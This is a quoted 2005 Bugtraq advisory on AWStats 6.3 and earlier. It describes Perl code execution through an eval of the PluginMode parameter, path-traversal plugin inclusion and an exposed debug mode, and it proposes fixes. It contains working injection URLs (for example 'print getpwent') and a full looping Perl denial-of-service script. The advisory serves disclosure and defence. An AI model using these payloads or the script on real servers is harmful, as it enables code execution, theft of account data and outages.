In-Reply-To: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx> >Received: (qmail 16782 invoked from network); 14 Feb 2005 18:00:47 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27) > by mail.securityfocus.com with SMTP; 14 Feb 2005 18:00:47 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing3.securityfocus.com (Postfix) with QMQP > id 01F1F236F68; Mon, 14 Feb 2005 10:27:21 -0700 (MST) >Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx> >List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx> >List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx> >Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx >Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx >Received: (qmail 27084 invoked from network); 14 Feb 2005 00:57:36 -0000 >Date: 14 Feb 2005 08:10:40 -0000 >Message-ID: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: GHC@xxxxxxxxxxxxxxxxxxxxx, > [ru]@securityfocus.com@www.securityfocus.com <foster@xxxxxx> >To: bugtraq@xxxxxxxxxxxxxxxxx >Subject: AWStats <= 6.4 Multiple vulnerabilities > Must read AWStats <= 6.3. Version 6.4 is not affected. > > >/*==========================================*/ >// GHC -> AWStats <- ADVISORY >\\ PRODUCT: AWStats >// VERSION: <= 6.3 >\\ URL: http://awstats.sourceforge.net/ >// VULNERABILITY CLASS: Multiple vulnerabilities >\\ RISK: high >/*==========================================*/ > >[Product Description] >"AWStats is a free powerful tool that generates advanced web, ftp or mail server statistics, graphically. >This log analyzer works as a CGI or from command line and shows you all possible information your log contains, >in few graphical web pages". >Current stable version: AWStats 6.3 final >Development version is 6.4 - 2005-02-06 14:31 Version 6.4 release is not affected. > >[Summary] >Successful exploitation of an input validation vulnerability in AWStats scripts >allows attackers to execute limited perl directives under the privileges of >the web server, get sensetive information. >Some actions of the attacker can lead to denial of service. > >[Details] >Some AWStats's functions can be extended with plugins. >Two variables (loadplugin & pluginmode) are dealing with it. >The first one (loadplugin) is responsible for plugins list (plugin1, plugin2); the second one >runs plugin's functions. > >Exploitable example (raw log plugin): >http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog > >Server answer: >192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606 >192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css HTTP/1.1" 200 2986 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 200 7710 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/logo.gif HTTP/1.1" 200 14443 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200 429 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1" 200 2532 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250 >192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/vcss.gif HTTP/1.1" 200 1547 >192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 200 7333 >192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1" 200 7588 >192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1" 200 7910 >192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 7340 >192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200 153 > >The dangerous fact is that attacker can read sensitive information such as >IP address, admin scripts names, non encoded GET queries, etc. > >Our variables pass some verification (as others), but it is not enough for security: > >sub Sanitize { > my $stringtoclean=shift; > $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g; > return $stringtoclean; >} > >Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol. >It's enough for variables with path to configuration files, but not for plugin tasks. >In case of "loadplugin" & "pluginmode" developers obviously have a lot of trust to the user. > >So, let's see what can be done, in fact. > >[1] Perl code execution. >http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent > >we'll get the action in next piece of code: > ># AWStats output is replaced by a plugin output >if ($PluginMode) { > my $function="BuildFullHTMLOutput_$PluginMode()"; > eval("$function"); > if ($? || $@) { error("$@"); } > &html_end(0); > exit 0; >} > >If variable exists, we'll get code execution. This happens after sanitizing (see privious). >Here we have intresting part in: > my $function="BuildFullHTMLOutput_$PluginMode()"; > eval("$function"); > >This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from >rawlog.pm plugin). >Ideal case: "module name"::BuildFullHTMLOutput_"function name"(). >But if we won't specify the name of module (with "loadplugin" parameter) we'll get the next: > >main::BuildFullHTMLOutput_"function name"(). > >By the way, there is permited symbol ':' in user input parameters. So, we can send: > >PluginMode=:print+getpwent > >And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. >This will satisfy eval() requirements., and :print getpwent() is executed. > >http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent > >Sanitazing limits user's input, but there is no filtration for call sympols '()'. >Here we can see that somebody can perform DoS attack. >This is example of simple code for successful DoS exploitation: > >#!/usr/bin/perl > >use IO::Socket; >$server = 'www.example.com'; >sub ConnectServer { > $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") > || die "Error\n"; > print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n"; > print $socket "Host: $server\n"; > print $socket "Accept: */*\n"; > print $socket "\n\n"; >} > >while () { > $rp = rand; > &ConnectServer; >} > >[BUGFIX] >Change vulnerable code for: > >sub PluginSanitize { > my $stringtoclean=shift; > $stringtoclean =~ s/[^\w]//g; > return $stringtoclean; >} > > >[2] Arbitrary plugin including. >http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib > >Arbitrary module from user's input through "loadplugin" parameter can be included with "require" function.. > >Bugfix - as above or something like this: > >opendir (PDIR, './plugins'); >@FilesPDIR = readdir(PDIR); >closedir (PDIR); >foreach $FilesPName (@FilesPDIR) { > if ($FilesPName =~ m/$loadplugin/) { > } >} > >The good thing is the poison null-byte (%00) has no place (transferes to 00). > >[3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development). >Every user can access debug function: >http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1 >http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2 > > >[DISCLOSURE TIMELINE] > >10-02-2005 Initial vendor notification. >14-02-2005 No response. >14-02-2005 Bug-traq post. > >/* ================================================== */ >/* www.ghc.ru -- security games & challenges */ >/* ================================================== */ >/* greets to: RST.void.ru, cr0n & all quest hunters %)*/ >/* Special respect to e-defense. */ >/* ================================================== */ >
